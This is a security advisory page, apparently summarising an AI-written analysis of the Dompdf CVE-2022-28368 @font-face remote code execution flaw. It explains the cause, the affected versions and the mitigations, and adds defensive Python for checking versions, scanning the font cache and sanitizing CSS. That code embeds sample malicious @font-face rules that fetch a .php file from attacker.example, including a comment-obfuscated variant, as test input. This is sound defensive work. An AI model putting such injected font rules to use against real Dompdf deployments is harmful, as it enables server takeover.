This is a summary of the AI-generated 10-question deep analysis. The full version (longer answers, follow-up Q&A, related CVEs) requires login.
Q1: What is this vulnerability? (Essence + Consequences)
**Essence**: Dompdf < 1.2.1 (CVE-2022-28368) has a critical flaw allowing **Remote Code Execution (RCE)** via CSS `@font-face` injection: an attacker who can feed HTML/CSS into the converter points `src: url()` at a `.php` file on a host they control.…
**Root Cause**: Improper validation of the `src: url()` value in `@font-face` rules. **Flaw**: Dompdf fetches the remote "font" and writes it into its font cache under a name built from the font family, style and a hash of the URL, keeping the URL's `.php` extension. If that cache directory is reachable through the web server, requesting the cached file executes the attacker's PHP. Version 1.2.1 rejects such font sources instead of caching them.
Q3: Who is affected? (Versions/Components)
**Affected**: Users running **Dompdf versions strictly less than 1.2.1**. **Component**: The HTML-to-PDF conversion library (`dompdf/dompdf`) used in PHP applications, typically to render invoices, reports or user-submitted documents.
Q4: What can hackers do? (Privileges/Data)
**Hacker Actions**: Execute arbitrary PHP code on the server. **Privileges**: Gain the same privileges as the web server process (for example `www-data`). **Data**: Access, modify, or delete any data the web server can reach, including application secrets and database credentials in configuration files.
Q5: Is exploitation threshold high? (Auth/Config)
**Threshold**: **Low**. **Auth**: Dompdf itself requires none; the attacker only needs whatever access the application grants to submit HTML/CSS for conversion (often an unauthenticated form, sometimes a logged-in user). **Config**: Requires a vulnerable Dompdf version processing user-supplied HTML/CSS, remote resource loading enabled (the `isRemoteEnabled` option, off by default) so the font can be fetched from the attacker's host, and a font cache directory that the web server serves with PHP execution enabled.
Q6: Is there a public Exp? (PoC/Wild Exploitation)
**Public Exp?**: **YES**. Multiple PoCs exist on GitHub (e.g., `rvizx/CVE-2022-28368`) and ExploitDB. Automated Python scripts are available that host the malicious font, inject the `@font-face` rule and compute the cached file's path, so exploitation needs little skill.
Q7: How to self-check? (Features/Scanning)
**Self-Check**: Look up the installed `dompdf/dompdf` version in `composer.lock` (or `composer show dompdf/dompdf`) and compare it against 1.2.1. **Feature**: Check whether `@font-face` CSS rules are processed from untrusted user input and whether `isRemoteEnabled` is turned on. Also inspect the font cache directory (`lib/fonts` by default) for `.php` files other than Dompdf's own `dompdf_font_family_cache.php`; a stray `.php` there is evidence of attempted or successful exploitation.…
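The two checks above can be scripted. The following Python is an added example, not code from the page or from the Dompdf project: it reads the `dompdf/dompdf` version out of `composer.lock`, compares it against the fixed release, and flags non-Dompdf `.php` files in a font cache listing. The sample lock file content and file names are constructed for the example; the only real artefact it knows about is Dompdf's legitimate `dompdf_font_family_cache.php`.

```python
"""Self-check helpers for CVE-2022-28368 (Dompdf < 1.2.1 @font-face RCE).
Added example; not part of the original page or of Dompdf itself."""
import json
import os
import re

FIXED_VERSION = (1, 2, 1)

# Files Dompdf legitimately keeps in its font directory with a .php extension.
LEGITIMATE_PHP_IN_FONT_DIR = {
    "dompdf_font_family_cache.php",
    "dompdf_font_family_cache.dist.php",
}

# Constructed sample composer.lock content (not a real project's lock file).
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "dompdf/dompdf", "version": "v1.2.0"},
        {"name": "phenx/php-font-lib", "version": "0.5.4"},
    ],
    "packages-dev": [],
})


def parse_version(version: str):
    """Turn 'v1.2.0' / '1.2.0' / '0.8.6' into a comparable tuple of ints.
    Returns None for branch aliases such as 'dev-master'."""
    m = re.match(r"v?(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        return None
    return tuple(int(part or 0) for part in m.groups())


def dompdf_version_from_lock(lock_text: str):
    """Return the locked dompdf/dompdf version string, or None if absent."""
    data = json.loads(lock_text)
    for section in ("packages", "packages-dev"):
        for pkg in data.get(section, []):
            if pkg.get("name") == "dompdf/dompdf":
                return pkg.get("version")
    return None


def is_vulnerable_version(version: str) -> bool:
    """True when the version is below 1.2.1. Unparsable (dev) versions are
    treated as suspect, since a branch alias tells you nothing about the fix."""
    parsed = parse_version(version)
    if parsed is None:
        return True
    return parsed < FIXED_VERSION


def flag_font_cache_entries(names):
    """Given file names from the font cache directory, return those with a
    .php extension that Dompdf itself would never create there."""
    return sorted(
        n for n in names
        if n.lower().endswith(".php") and n not in LEGITIMATE_PHP_IN_FONT_DIR
    )


def scan_font_dir(path: str):
    """Convenience wrapper: list a real font cache directory and flag it."""
    return flag_font_cache_entries(os.listdir(path))


if __name__ == "__main__":
    version = dompdf_version_from_lock(SAMPLE_LOCK)
    print(f"dompdf/dompdf {version}: "
          f"{'VULNERABLE' if is_vulnerable_version(version) else 'patched'}")
    # Constructed listing; a real scan would use scan_font_dir("lib/fonts").
    listing = ["Helvetica.afm", "dompdf_font_family_cache.php",
               "exploitfont_normal_3f1c2e9a.php"]
    print("suspicious cache entries:", flag_font_cache_entries(listing))
```

Run `scan_font_dir()` against the configured `fontCache` directory rather than assuming `lib/fonts`, since applications often relocate it; a hit there should be treated as an incident, not just a misconfiguration.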
**No Patch?**: Strip or reject `@font-face` rules in any CSS that comes from untrusted input; if custom fonts are needed, allow only `src: url()` values that point at your own static font host with a real font extension. **Workaround**: Turn off remote resource loading (`isRemoteEnabled`) unless the application truly needs it, move the font cache (`fontCache`/`fontDir` options) outside the web root or configure the web server to never execute `.php` under it, and restrict `@font-face` usage to trusted, static resources only. These measures reduce exposure but do not replace the upgrade.…
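A concrete version of the "strip or allowlist `@font-face`" workaround, as an added example that is not code from the page or from Dompdf: untrusted CSS is scanned for `@font-face` blocks, and a block survives only if every `url()` in it points at a trusted origin and ends in a font extension. The trusted host `fonts.example.com`, the attacker host `attacker.example` and the sample stylesheet are all constructed for the example; the allowed extensions are an assumption you would adjust to the formats you actually serve. Comments are removed first so that `@font-/**/face` cannot slip past the pattern.

```python
"""Allowlist-based @font-face sanitizer for untrusted CSS fed to Dompdf.
Added example; not part of the original page or of Dompdf itself."""
import re
from urllib.parse import urlparse

# Assumption: the only host allowed to serve fonts is your own static host.
TRUSTED_FONT_ORIGINS = {"https://fonts.example.com"}
# Assumption: only these font formats are served from that host.
FONT_EXTENSIONS = (".ttf", ".otf")

_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
# @font-face bodies contain no nested braces, so one [^{}]* span is enough.
_FONT_FACE_RE = re.compile(r"@font-face\s*\{[^{}]*\}", re.I)
_URL_RE = re.compile(r"""url\(\s*(['"]?)(.*?)\1\s*\)""", re.I | re.S)


def font_url_allowed(url: str) -> bool:
    """Accept only http(s) URLs on a trusted origin whose path has a font
    extension. data:, file:, phar:// and relative paths are all rejected, and
    the check uses the path only, so 'x.php?y=.ttf' does not pass."""
    u = urlparse(url.strip())
    if u.scheme not in ("http", "https"):
        return False
    origin = f"{u.scheme}://{u.netloc}".lower()
    if origin not in TRUSTED_FONT_ORIGINS:
        return False
    return u.path.lower().endswith(FONT_EXTENSIONS)


def sanitize_css(css: str):
    """Return (sanitized_css, dropped_rules). A @font-face rule is kept only if
    it has at least one url() and every url() is allowed; everything else in
    the stylesheet is left untouched."""
    css = _COMMENT_RE.sub("", css)
    dropped = []

    def _filter(match):
        rule = match.group(0)
        urls = [u for _quote, u in _URL_RE.findall(rule)]
        if urls and all(font_url_allowed(u) for u in urls):
            return rule
        dropped.append(rule)
        return ""

    return _FONT_FACE_RE.sub(_filter, css), dropped


# Constructed sample: one malicious rule of the CVE-2022-28368 shape and one
# legitimate rule pointing at the trusted font host.
SAMPLE_CSS = """
@font-face {
    font-family: 'exploitfont';
    src: url('http://attacker.example/exploit_font.php');
    font-weight: normal;
}
@font-/**/face {
    font-family: 'sneaky';
    src: url(http://attacker.example/sneaky.php);
}
@font-face {
    font-family: 'Corp';
    src: url("https://fonts.example.com/corp.ttf") format("truetype");
}
p { font-family: 'exploitfont', 'Corp', sans-serif; }
"""

if __name__ == "__main__":
    clean, dropped = sanitize_css(SAMPLE_CSS)
    print(f"dropped {len(dropped)} @font-face rule(s)")
    print(clean)
```

The conservative alternative is to drop every `@font-face` rule from untrusted CSS; do that if you have no font host of your own to allowlist. Either way, this is a filter on the input side and should sit alongside, not instead of, disabling `isRemoteEnabled` and upgrading Dompdf.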
**Urgency**: **CRITICAL**. **Priority**: Immediate patching required. An RCE of this kind hands the attacker the web server's account and, from there, a foothold for takeover of the host. Do not delay upgrading to v1.2.1+, and check the font cache for stray `.php` files before assuming you were not already hit.